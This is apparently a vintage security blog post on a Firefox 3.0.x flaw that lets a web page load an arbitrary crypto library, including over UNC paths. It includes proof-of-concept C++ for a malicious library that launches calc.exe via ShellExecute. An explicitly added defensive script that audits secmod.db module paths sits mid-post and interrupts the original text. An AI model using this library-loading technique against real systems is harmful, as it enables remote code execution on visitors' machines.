Call an arbitrary library with JavaScript? I think I will.

This is a handy way to execute code within the browser. Kudos to Jesse Ruderman and Dan Kaminsky for the bug discovery and POC.

Essentially, in Firefox up through 3.0.13 (my ubuntu 9.04 is running 3.0.11), there’s a publicly exposed JavaScript function that lets a page load an arbitrary crypto library on the system. Assuming you’re able to place a malicious library (see below) in the target environment, you could use this to get other systems to execute it. Extra win: you can use UNC paths to locate the library 🙂
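From the defender's side, the question is which modules a profile has already registered. The script below is an added example, not code from the original post or from Mozilla: it scans the NSS module database of a Firefox profile for registered crypto (PKCS#11) library paths and flags any that are UNC paths, bare filenames (resolved by the loader's search order) or outside an allow-list of trusted directories. It assumes the legacy NSS database is the file secmod.db in the profile directory and that module library paths appear in it as printable strings; the sample blob, the 10.0.0.5 share and the allow-list are constructed for the example.

```python
import re
from pathlib import Path

# Constructed sample resembling the contents of an NSS secmod.db file
# (module names and library paths embedded as strings between binary
# framing). The bytes are made up for this example, not a real file.
SAMPLE_SECMOD_DB = (
    b"\x00\x06\x15\x61\x00\x00\x00\x02NSS Internal PKCS #11 Module\x00"
    b"\x00\x00\x00\x00Builtin Roots Module\x00libnssckbi.so\x00"
    b"\x00\x00\x00\x00Evil Module\x00\\\\10.0.0.5\\share\\evil.dll\x00"
    b"\x00\x00\x00\x00Legit Token\x00C:\\Program Files\\Vendor\\vendor_p11.dll\x00"
)

# Runs of printable ASCII; candidates are then filtered by file extension.
_PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")

# Assumed allow-list of directories a PKCS#11 module may legitimately be
# loaded from on this host; adjust per deployment.
TRUSTED_PREFIXES = (
    "c:\\program files\\",
    "c:\\windows\\system32\\",
    "/usr/lib/",
    "/usr/lib64/",
)


def extract_library_paths(blob: bytes) -> list[str]:
    """Return printable strings in the blob that look like shared-library paths."""
    found = []
    for match in _PRINTABLE_RE.finditer(blob):
        text = match.group().decode("ascii")
        if text.lower().endswith((".dll", ".so", ".dylib")):
            found.append(text)
    return found


def classify_path(path: str) -> str:
    """Classify a module path: 'unc' for \\\\server\\share paths, 'bare' for a
    filename with no directory, 'trusted' if under an allow-listed
    directory, otherwise 'untrusted'."""
    lowered = path.lower()
    if lowered.startswith("\\\\") or lowered.startswith("//"):
        return "unc"
    if "\\" not in lowered and "/" not in lowered:
        return "bare"
    if any(lowered.startswith(prefix) for prefix in TRUSTED_PREFIXES):
        return "trusted"
    return "untrusted"


def audit_secmod_db(blob: bytes) -> list[tuple[str, str]]:
    """Return (path, verdict) pairs for every module path that is not trusted."""
    findings = []
    for path in extract_library_paths(blob):
        verdict = classify_path(path)
        if verdict != "trusted":
            findings.append((path, verdict))
    return findings


def audit_profile(profile_dir: str) -> list[tuple[str, str]]:
    """Read secmod.db from a Firefox profile directory and audit it."""
    return audit_secmod_db(Path(profile_dir, "secmod.db").read_bytes())


if __name__ == "__main__":
    for path, verdict in audit_secmod_db(SAMPLE_SECMOD_DB):
        print(f"{verdict:>9}: {path}")
```

On the constructed sample the scan reports the bare libnssckbi.so (worth confirming it resolves to the expected system copy) and the UNC path to evil.dll, while the vendor module under Program Files is accepted. A string scan is a heuristic; a module registered under a path the regex does not catch will be missed, so treat a clean result as a starting point rather than proof.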

Source is here (note: this is live, but it calls a non-existent crypto library).

The malicious library would need a function named CpkunkcsApp() (the class constructor shown below), which, in this case, just calls ShellExecute.

#include <windows.h>
#include <shellapi.h>
#include <cstring>

class CpkunkcsApp { public: CpkunkcsApp(); };

// Constructor defined by the library; in this case it just launches calc.exe.
CpkunkcsApp::CpkunkcsApp()
{
    const char *str = "c:\\windows\\system32\\calc.exe";
    size_t len = strlen(str) + 1;               // room for the terminating NUL
    wchar_t *wText = new wchar_t[len];          // original allocated strlen(str): one short
    memset(wText, 0, len * sizeof(wchar_t));
    ::MultiByteToWideChar(CP_ACP, 0, str, -1, wText, (int)len);
    ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);
    delete[] wText;                             // original leaked the buffer
}
